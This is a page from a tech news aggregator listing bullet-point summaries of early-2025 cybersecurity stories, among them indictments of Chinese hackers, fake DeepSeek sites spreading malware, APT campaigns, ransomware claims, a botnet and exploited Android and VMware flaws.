menu
techminis

A naukri.com initiative

New

google-web-stories
Home

>

Hacking News

Hacking News

source image

Securityaffairs

4w

read

319

img
dot

Image Credit: Securityaffairs

The U.S. DoJ charges 12 Chinese nationals for state-linked cyber operations

  • The U.S. DoJ has charged 12 Chinese nationals, including PRC security officers and members of the APT27 group, for state-linked cyber operations.
  • Chinese hackers, employed by i-Soon or freelance, targeted U.S. critics and Asian governments under PRC direction.
  • The DoJ indicted individuals for hacking activities, selling stolen data, and avoiding state attribution for cyber theft.
  • FBI's Public Service Announcements highlighted China's hacker-for-hire operations and global cyber intrusions.
  • U.S. authorities unsealed indictments against i-Soon employees and MPS officers, condemning cyber activities targeting various entities.
  • The FBI and State Department offer rewards for information on state-sponsored cyberattacks and indicted individuals.
  • i-Soon's involvement with PRC government agencies in hacking activities and selling data to diverse victims was revealed.
  • Specialized software developed by i-Soon targeted accounts on platforms like Twitter, Gmail, and Microsoft Outlook.
  • The tailored software allowed for unauthorized access to victim accounts, bypassing security measures like multi-factor authentication.
  • Charges against the Chinese nationals include computer intrusions and wire fraud, with potential maximum sentences set by Congress.

Read Full Article

like

19 Likes

share

4 Shares

source image

Securelist

4w

read

221

img
dot

Image Credit: Securelist

Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity

  • The release of DeepSeek-R1, a reasoning large language model, in early 2025 attracted cybercriminals due to its popularity and availability both for local use and as a free service.
  • Cybercriminals created fake websites mimicking the official DeepSeek chatbot site to distribute malicious code disguised as a client for the service.
  • The fake websites prompted users to download applications that contained malicious payloads, such as a Python stealer script that gathers sensitive data from victims' computers.
  • The malicious script is designed to collect data like browser cookies, login credentials, cryptocurrency wallet information, and more, which can lead to severe consequences for victims.
  • Other instances involved fake DeepSeek websites distributing Trojans through malicious installers that gain remote access to victims' computers.
  • Some campaigns targeted Chinese-speaking users by distributing malicious executable files associated with specific domains.
  • Users are advised to be cautious of links from unverified sources, especially for popular services like DeepSeek, which does not have a native Windows client.
  • These cybercrime campaigns use various schemes to lure victims, including distributing links through messengers, social networks, typosquatting, and affiliate programs.
  • It is emphasized that digital hygiene practices and robust security solutions can significantly reduce the risk of device infection and personal data loss.
  • Indicators of compromise, including malicious domains and MD5 hashes, have been provided to help in identifying potential threats related to these cybercriminal activities.

Read Full Article

like

13 Likes

share

3 Shares

source image

Securityaffairs

4w

read

438

img
dot

Image Credit: Securityaffairs

Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

  • China-linked Lotus Blossom APT targets governments and industries in Asian countries with new Sagerunex backdoor variants.
  • Lotus Blossom APT has been using the Sagerunex backdoor since at least 2016.
  • Two new Sagerunex backdoor variants use cloud services like Dropbox, Twitter, and Zimbra for C2 communication.
  • Lotus Blossom group employs various tools and tactics to evade detection and achieve their objectives.

Read Full Article

like

26 Likes

share

6 Shares

source image

Siliconangle

4w

read

8

img
dot

Image Credit: Siliconangle

Justice Department indicts Chinese officials and contractors over cyber intrusion campaign

  • The U.S. Department of Justice has indicted 12 Chinese nationals, including officials and contractors, over a cyber intrusion campaign.
  • The indictment alleges that the Chinese contractor, Anxun Information Technology Co. Ltd., executed cyberattacks on behalf of government ministries while also selling stolen information for profit.
  • The malicious actors targeted U.S. government agencies, religious organizations, human rights groups, journalists, and foreign ministries of multiple Asian nations.
  • The Justice Department seized internet domains and server accounts used by the accused to disrupt their operational infrastructure.

Read Full Article

like

Like

share

Share

source image

Securityaffairs

4w

read

221

img
dot

Image Credit: Securityaffairs

China-linked APT Silk Typhoon targets IT Supply Chain

  • China-linked APT group Silk Typhoon is now targeting global IT supply chains, using IT firms to spy and move laterally.
  • Silk Typhoon has shifted tactics to target IT solutions like remote management tools and cloud apps for initial access.
  • The group exploits unpatched apps and stolen credentials to escalate privileges and engage in espionage.
  • Silk Typhoon targets multiple sectors worldwide and Microsoft is working to disrupt their operations and enhance security defenses.

Read Full Article

like

13 Likes

share

3 Shares

source image

TechCrunch

4w

read

150

img
dot

Image Credit: TechCrunch

Justice Department charges Chinese hackers-for-hire linked to Treasury breach

  • The U.S. Department of Justice has charged 12 Chinese hackers linked to hacking over 100 American organizations, including the U.S. Treasury.
  • The charged individuals played a key role in China's hacker-for-hire ecosystem, targeting organizations to suppress free speech and religious freedoms.
  • Two of the indicted hackers are linked to the China government-backed group APT27 and were involved in multi-year, for-profit computer intrusion campaigns.
  • The FBI has seized the infrastructure used by one of the hackers for the U.S. Treasury hack, and charges have been announced against employees of Chinese government hacking contractor I-Soon.

Read Full Article

like

9 Likes

share

2 Shares

source image

Securityaffairs

4w

read

236

img
dot

Image Credit: Securityaffairs

Hunters International gang claims the theft of 1.4 TB of data allegedly stolen from Tata Technologies

  • Ransomware group Hunters International claims to have hacked Tata Technologies, threatening to leak 1.4 TB of stolen data.
  • The group claims the theft of 1.4 terabytes of data and is threatening to leak it.
  • The ransomware attack took place in January as per a regulatory filing with the Indian National Stock Exchange.
  • The company has disconnected some of its IT services to contain the threat, but all systems have now been restored.

Read Full Article

like

14 Likes

share

3 Shares

source image

Securityaffairs

4w

read

137

img
dot

Image Credit: Securityaffairs

New Eleven11bot botnet infected +86K IoT devices

  • The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs).
  • The botnet has targeted various sectors, including communications service providers and gaming hosting infrastructure, and has used a variety of attack vectors.
  • GreyNoise researchers have flagged 305 IP addresses as malicious, with 61% of them originating from Iran.
  • Shadowserver Foundation has discovered approximately 86,400 infected devices, with the highest number in the US and the United Kingdom.

Read Full Article

like

8 Likes

share

1 Share

source image

Securityaffairs

4w

read

434

img
dot

Image Credit: Securityaffairs

Polish Space Agency POLSA disconnected its network following a cyberattack

  • The Polish space agency POLSA has disconnected its network from the internet following a cyberattack.
  • The agency disconnected its infrastructure to contain the attack and secure data, indicating a possible ransomware attack.
  • The cybersecurity incident may have been carried out by a nation-state actor, potentially Russia.
  • Technical details about the attack have not been provided by POLSA.

Read Full Article

like

26 Likes

share

6 Shares

source image

Securityaffairs

4w

read

159

img
dot

Image Credit: Securityaffairs

U.S. CISA adds Linux kernel and VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities catalog

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Linux kernel and VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities catalog.
  • The Linux kernel vulnerability (CVE-2024-50302) was fixed by Google, while three VMware ESXi vulnerabilities (CVE-2025-22225, CVE-2025-22224, CVE-2025-22226) were disclosed and actively exploited.
  • The Linux kernel vulnerability (CVE-2024-50302) was likely used by Cellebrite's mobile forensic tools to unlock an Android phone.
  • Federal agencies are ordered to address the vulnerabilities by March 25, 2025, as per Binding Operational Directive (BOD) 22-01.

Read Full Article

like

9 Likes

share

2 Shares

source image

Securityaffairs

4w

read

217

img
dot

Image Credit: Securityaffairs

Digital nomads and risk associated with the threat of infiltred employees

  • Companies are facing the risk of insider threats, worsened by remote work.
  • North Korean hackers are infiltrating firms through fake IT hires, stealing data.
  • Thorough screening and stronger vetting processes are essential to mitigate insider threats.
  • Strengthening hiring practices and educating HR employees on the risks associated with infiltration are crucial.

Read Full Article

like

13 Likes

share

3 Shares

source image

TechCrunch

4w

read

386

img
dot

Image Credit: TechCrunch

Polish space agency says it’s investigating a cyberattack

  • Poland's space agency (POLSA) is investigating a cyberattack on its IT infrastructure.
  • POLSA disconnected its network from the internet after detecting the attack and its website remains offline.
  • The nature of the cyberattack is still unknown and state cybersecurity services are working to identify the perpetrators.
  • Poland has previously reported being the most attacked country in the European Union, with Russia being attributed as the source of many incidents.

Read Full Article

like

23 Likes

share

5 Shares

source image

Securityaffairs

4w

read

235

img
dot

Image Credit: Securityaffairs

Google fixed two actively exploited Android flaws

  • Google has released the Android March 2025 security update, addressing over 40 vulnerabilities.
  • Two of the vulnerabilities, CVE-2024-43093 and CVE-2024-50302, were actively exploited in attacks in the wild.
  • CVE-2024-43093 is a Privilege Escalation Vulnerability in Android Framework, requiring user interaction for exploitation.
  • Android's March 2025 security update also addressed ten critical vulnerabilities in the System component, capable of remote code execution.

Read Full Article

like

14 Likes

share

3 Shares

source image

Securityaffairs

4w

read

199

img
dot

Image Credit: Securityaffairs

Mass exploitation campaign hit 4,000+ ISP networks to deploy info stealers and crypto miners

  • A mass exploitation campaign originating from Eastern Europe has targeted ISPs in China and the U.S. West Coast.
  • The threat actors gain access through weak credential brute-force and deploy info stealers and crypto miners.
  • The malware disables remote access and uses PowerShell to drop binaries and disable security features.
  • The campaign focuses on ISPs in China and the U.S. West Coast, and the malware sends data to its C2 server via a Telegram bot.

Read Full Article

like

12 Likes

share

2 Shares

source image

TheNewsCrypto

4w

read

306

img
dot

Image Credit: TheNewsCrypto

Bybit CEO Says 77% of Stolen Funds From Bybit Hack Still Traceable

  • Bybit CEO shared that 77% of stolen funds are still traceable while 20% went dark and 3% froze.
  • On-chain data tracker Ember reported that the Byit hack laundered all the stolen funds, i.e., 499,000 ETH.
  • Ben Zhou shared a complete breakdown of funds and their conversion into other cryptocurrency, 83% of the total hacked funds were converted into Bitcoin.
  • Bybit CEO created a Lazarusbounty.com website to share details of stolen funds, with 11 bounty hunters assisting in freezing the funds.

Read Full Article

like

18 Likes

share

4 Shares

Prev

10
11
12
13
14
15
16
17
18
19
20

Next

For uninterrupted reading, download the app